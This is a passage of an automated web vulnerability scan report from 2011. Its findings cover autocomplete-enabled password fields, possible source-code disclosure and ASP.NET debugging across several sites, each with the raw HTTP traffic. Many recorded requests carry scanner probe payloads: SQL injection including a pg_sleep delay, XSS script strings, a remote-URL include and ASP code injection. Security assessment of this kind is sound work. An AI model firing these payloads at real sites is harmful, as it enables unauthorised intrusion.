Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:42 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:42 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=//netsparker.com/n/n.css?0x000016" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.279. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%22

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%22%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

17.280. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x00000E%2529%253C%252Fscript%253E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x00000E%2529%253C%252Fscript%253E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x00000E%2529%253C%252Fscript%253E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.281. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27%22%20ns=%20netsparker(0x00001E)%20

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%27%22%20ns=%20netsparker(0x00001E)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27%22%20ns=%20netsparker(0x00001E)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.282. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=http://netsparker.com/n?%00

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=http://netsparker.com/n?%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n?%00" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.283. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%3Cscript%3Ens(0x000040)%3C/script%3E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%3Cscript%3Ens(0x000040)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%3Cscript%3Ens(0x000040)%3C/script%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.284. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%3BSELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register='%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.285. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042) previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm/%22ns=%22netsparker(0x000042) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:52 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:52 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.286. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:55 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:55 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:55 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.287. http://mail.ru/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mail.ru
Path:	/

Issue detail

The page contains a form with the following action URL:

http://e.mail.ru/cgi-bin/auth

The form contains the following password field with autocomplete enabled:

Password

Request

Response

17.288. http://my.webalta.ru/public/engine/templates.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/engine/templates.js

Issue detail

The page contains a form with the following action URL:

http://my.webalta.ru/public/engine/templates.js

The form contains the following password field with autocomplete enabled:

pass

Request

Response

17.289. http://my.webalta.ru/public/engine/templates.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/engine/templates.js

Issue detail

The page contains a form with the following action URL:

http://my.webalta.ru/public/engine/templates.js

The form contains the following password fields with autocomplete enabled:

pass
pass2

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td style=\'width:50%;\'><form onsubmit="f_reg(this); return false;" >';
       str+='...................... ................... ...... ......................, ...... ........ ................ .......... .................. .. ................ .......................';
       s
...[SNIP]...
<br><input size=20 name="pass" type="password" value="" onClick=\'this.focus();\'>';
       str+='<br>
...[SNIP]...
<br><input size=20 name="pass2" type="password" value="" onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

17.290. http://odnoklassniki.ru/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://odnoklassniki.ru
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&st.cmd=anonymLogin&tkn=6956

The form contains the following password field with autocomplete enabled:

st.password

Request

Response

17.291. http://pda.loveplanet.ru/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pda.loveplanet.ru
Path:	/

Issue detail

The page contains a form with the following action URL:

http://pda.loveplanet.ru/a-logon/

The form contains the following password field with autocomplete enabled:

password

Request

Response

17.292. http://pretty.ru/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pretty.ru
Path:	/

Issue detail

The page contains a form with the following action URL:

http://pretty.ru/a-logon/

The form contains the following password field with autocomplete enabled:

password

Request

Response

17.293. https://system.netsuite.com/pages/customerlogin.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://system.netsuite.com
Path:	/pages/customerlogin.jsp

Issue detail

The page contains a form with the following action URL:

https://system.netsuite.com/app/login/nllogin.nl

The form contains the following password field with autocomplete enabled:

password

Request

GET /pages/customerlogin.jsp HTTP/1.1
Host: system.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:13 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 2015151527:616363742D6A6176613036392E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=661
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 49795


<html>
<head>
<title>NetSuite - Customer Login</title>
<meta name="description" content="NetSuite provides a login page for
...[SNIP]...
<td width="237"><form method="post" action="https://system.netsuite.com/app/login/nllogin.nl">
<TABLE WIDTH="237" BORDER="0" CELLSPACING="0" CELLPADDING="0">
...[SNIP]...
<TD><INPUT TYPE="password" NAME="password" SIZE="30" BORDER="0" onKeyPress="if (event.keyCode == 13) {if(!checkEmpty()){return false;}document.forms[0].jsenabled.value = 'T';document.forms[0].submit(); return false; } return true;" tabindex="2"></TD>
...[SNIP]...

17.294. http://vkontakte.ru/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://vkontakte.ru
Path:	/

Issue detail

The page contains a form with the following action URL:

http://login.vk.com/?act=login

The form contains the following password field with autocomplete enabled:

pass

Request

Response

17.295. http://www.livejournal.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.livejournal.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.livejournal.com/login.bml?ret=1

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws24
ETag: "2973888db3f7f93cbba310f7bf86432d"
Vary: Accept-Encoding
Content-Language: en
X-Debug: USen gzip (null)
X-VWS-Id: bil1-varn03
X-Varnish: 307153447 307107722
Age: 292
Via: 1.1 varnish
Content-Length: 50232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
<div class="lj_loginform" id="Login">
<form style='margin: 0; padding: 0;' method="post" action="https://www.livejournal.com/login.bml?ret=1" id="login" class="lj_login_form">

<input type='hidden' name='mode' value='login' />
...[SNIP]...
<td style='white-space: nowrap;'><input type="password" name="password" size="15" class="lj_login_password" tabindex="2" />
<input type='submit' value="Log in" tabindex='3' />
...[SNIP]...

17.296. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marketgid.com
Path:	/pnews/773204/i/7269/pp/2/1/

Issue detail

The page contains a form with the following action URL:

http://usr.marketgid.com/creative/auth/

The form contains the following password field with autocomplete enabled:

pass

Request

Response

18. Source code disclosure previous next
There are 3 instances of this issue:

https://hourly.deploy.com/hmc/report/index.cfm
http://l-files.livejournal.net/userapps/10/image
http://www.netsuite.com/portal/javascript/NLPortal.js

18.1. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

POST /hmc/report/index.cfm? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 66

j_password=3&j_username=%3c%25+response.write(268409241-22)+%25%3e

Response

HTTP/1.1 100 Continue

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:04 GMT;path=/
Content-Language: en-
...[SNIP]...
<input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="<% response.write(268409241-22) %>" onKeyPress="checkEnter();">
...[SNIP]...

18.2. http://l-files.livejournal.net/userapps/10/image previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://l-files.livejournal.net
Path:	/userapps/10/image

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /userapps/10/image HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Content-Type: text/plain
X-Varnish: 1354355956 1354352273
Via: 1.1 varnish
Age: 251968
Date: Mon, 25 Apr 2011 14:20:36 GMT
Last-Modified: Thu, 03 Feb 2011 11:13:43 GMT
Content-Length: 37341
Connection: keep-alive

......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS5 Macintosh.2011:02:03 11:49:08.........................
...[SNIP]...
.&...vF]2w..Y%...M..;.*K....G..._....=...x._..'..8BIM.!.....U..........A.d.o.b.e. .P.h.o.t.o.s.h.o.p.....A.d.o.b.e. .P.h.o.t.o.s.h.o.p. .C.S.5.....8BIM...................bhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
<?xpacket end="w"?>...XICC_PROFILE......HLino....mntrRGB XYZ ..... ...1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXY
...[SNIP]...

18.3. http://www.netsuite.com/portal/javascript/NLPortal.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.netsuite.com
Path:	/portal/javascript/NLPortal.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /portal/javascript/NLPortal.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=session#1303736347554-914602#1303743997|PC#1303736347554-914602.17#1304951737|check#true#1303742197; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 50687
Content-Disposition: inline;filename="NLPortal.js"
NS_RTIMER_COMPOSITE: 1229137097:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/octet-stream; charset=utf-8
Cache-Control: max-age=2534
Date: Mon, 25 Apr 2011 14:40:40 GMT
Connection: close

function getBaseDomain()
{
var domain = document.domain;
var ifirst= domain.indexOf(".");
domain=domain.substring(ifirst+1);
return domain;
}

// for netcrm the appdomain is netsuite
...[SNIP]...
&& partner.length > -1)
{
var vCookieVals = partner.split(",");
partner = vCookieVals[1];
//document.cookie = "visitorCookie; path=/portal/; domain="www.<%=NLConfig.getSystemDomain()%>"; expires=Fri, 02-Jan-1970 00:00:00";
// setCookie("visitorCookie", null, null, , "www.<%=NLConfig.getSystemDomain()%>", secure)
if(partner != null && partner != "")
setCookie("partner", partner, "/", null, getBaseDomain(), null)
}
}

//return null if no partner code exi
...[SNIP]...

19. ASP.NET debugging enabled previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ideco-software.ru
Path:	/Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: ideco-software.ru
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 25 Apr 2011 14:36:05 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Connection: Close
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=windows-1251
Content-Length: 39

Debug access denied to '/Default.aspx'.

20. Referer-dependent response previous next
There are 8 instances of this issue:

http://pixel.fetchback.com/serve/fb/pdc
http://solutions.kronos.com/content/experience2011
http://www.eset.com/us/
http://www.eset.com/us/business/products
http://www.eset.com/us/business/server-security/linux-file
http://www.eset.com/us/home/smart-security
http://www.eset.com/us/store
http://www.facebook.com/plugins/like.php

20.1. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Request 1

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303696672_1660:517000; uid=1_1303696672_1303179323923:6792170478871670; kwd=1_1303696672; sit=1_1303696672_2451:5100:0_3236:163063:162945_782:517349:517000; cre=1_1303696672; bpd=1_1303696672; apd=1_1303696672; scg=1_1303696672; ppd=1_1303696672; afl=1_1303696672

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:57 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cmp=1_1303744437_10164:0_10638:0_10640:0_10641:0_1437:0_1660:564765; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: uid=1_1303744437_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
